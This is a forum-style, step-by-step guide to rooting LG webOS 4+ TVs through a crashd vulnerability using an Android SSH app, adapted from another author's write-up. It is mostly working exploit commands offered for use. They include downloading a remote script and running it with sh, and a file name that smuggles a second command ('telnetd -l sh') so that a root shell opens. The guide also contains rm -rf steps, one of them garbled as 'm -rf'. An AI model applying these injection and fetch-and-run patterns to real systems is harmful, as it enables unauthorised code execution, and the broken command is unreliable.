I take no credit for the actual exploit but wanted to explain how to take advantage of exploit if you do not have access to a laptop to run dev manger. Original guide taken from https://gist.github.com/throwaway96/e811b0f7cc2a705a5a476a8dfa45e09f#file-crashd-md
This guide explains how to root an LG TV using a vulnerability in crashd using an Android phone. It works on webOS 4 and above and is currently unpatched (as of 2023-10-03). This means that as long as your TV is running at least webOS 4.0 (i.e., it is a 2018 model or newer), it should be vulnerable. It is recommended that anyone attempting this procedure do their own research in order to understand how the process works. In general, unless you understand exactly why you're doing something, you shouldn't do it. While there is relatively low risk of permananent damage to your TV, you're ultimately responsible if anything goes wrong. This will only work on webOS 4+.
For many commands (e.g., touch, mkdir, rm), there will be no output if the command is successful.
The commands involved in this process should complete more or less instantly. If it hasn't completed after 30 seconds, cancel it and try again.
Make sure Quick Start+ is disabled for rebooting to be effective.
OLEDs may have to be unplugged to properly reboot, as they can remain on for a while despite apeparing to be off.
Terminus (available on Google play store) - https://play.google.com/store/apps/details?id=com.server.auditor.ssh.client
Enable Developer mode on TV
1 - Enable Developer Mode on the TV: See this guide
from LG. If you have trouble (e.g., not getting the prompt to sign in), try rebooting. A reboot is required after setting Dev Mode Status to ON. The Developer Mode app should look something like this:
2 - Install the Terminus app on your phone.
3 - Disable Quick Start+ on the TV. This is in the menu, but its exact location depends on the webOS version. For example, on webOS 5, after pressing the menu button on the remote, it can be found in All Settings > General > Additional Settings. On webOS 6 and 7, it is under All Settings > General > Devices > TV Management.
4 - Reboot the TV (e.g., by turning it off and then back on) again. This is in addition to the reboot required when enabling developer mode. Make sure Quick Start+ is disabled! Note: If you have an OLED TV, it may stay on for a while (to run the Pixel Refresher) despite appearing to be off. Thus, when you turn it back on, it won't have actually rebooted. You can unplug it to be sure it's off.
5 - In the LG Developer Mode app, enable the Key Server. It should look like this:
Note that the key server only needs to be enabled while you are connecting for the first time. It will be automatically disabled on reboot.
6 - Open a browser on your phone and go to the following page 'http://TVIP:9991/webos_rsa`.
**replace 'TV IP' with your tvs ip address to download the private key file named “webos rsa”
7 - Open the Terminus app and click the plus sign on the bottom of the screen, select new host.
Fill out the details as follow
Alias- TV
Host/IP address - IP address of TV
Tick the SSH box
Port - 9922
Username- Prisoner
Key - this is where you need to pint the app to the file downloaded in stage 6.
Scroll down and tick the telnet box.
Port - 23
Username - Prisoner
Password - alpine
Save all Settings.
8 - Now you should be able to connect to TV using Terminus app. First connect using SSH When connect, copy this code into the terminal
curl -L -o /tmp/hb.ipk https://github.com/webosbrew/webos-homebrew-channel/releases/download/v0.6.3/org.webosbrew.hbchannel_0.6.3_all.ipk
luna-send-pub -w 10000 -i 'luna://com.webos.appInstallService/dev/install' '{"id":"com.ares.defaultName","ipkUrl":"/tmp/hb.ipk","subscribe":true}'
You should now have the homebrew channel installed on your TV.
9 - Close the SSH terminal and reconnect with the Telnet option. Use “jailpatch.sh” to generate an old “jail_app.conf” with a valid signature:
To achieve this, enter the code exactly as below
curl -L -o /tmp/jailpatch.sh https://raw.githubusercontent.com/throwaway96/install-jail-conf/main/jailpatch.sh && sh /tmp/jailpatch.sh
Make sure the output says “verification of current conf successful” before continuing.
10 - Reboot the TV (e.g., by turning it off and then back on) for a third time. Make sure Quick Start+ is disabled!
11 - Reconnect to TV using Terminus and the telnet option. Type the following exactly as below and press enter
touch /var/log/crashd/"x;telnetd -l sh"
Note: The character after the dash is a lowercase L, not a one. If you get an error like “sh: touch: not found”, just repeat the command. When successful there should be no output. If you get a "Permission denied" error, you probably didn't complete the previous steps regarding “jail_app.conf” correctly or did not reboot afterward.
12 - Again, copy the below exactly into the terminal and press enter
/media/developer/apps/usr/palm/services/org.webosbrew.hbchannel.service/elevate-service
13 - Execute this command to ensure developer mode never expires:
m -rf /var/luna/preferences/devmode_enabled && mkdir -p /var/luna/preferences/devmode_enabled
14 - If you have used RootMyTV before (even unsuccessfully), execute this command to remove leftover files:
rm /var/lib/webosbrew/startup.sh /mnt/lg/cmn_data/wam/extra_conf.sh
15 - Uninstall developer mode app from TV home menu. WARNING: Do NOT reinstall the LG Developer Mode app while your TV is rooted!
16 - Power off your TV. Make sure Quick Start+ is disabled!
Note: If an "Install Homebrew Channel" prompt appears (unlikely), don't choose "yes".
17 - After restart, confirm that "Root status" in Homebrew Channel is "ok"
18 - Turn on SSH in Homebrew Channel and restart
Enjoy your rooted TV!
Based on instructions by Shadow0304 Ideas and info based on crashd guide by throwaway96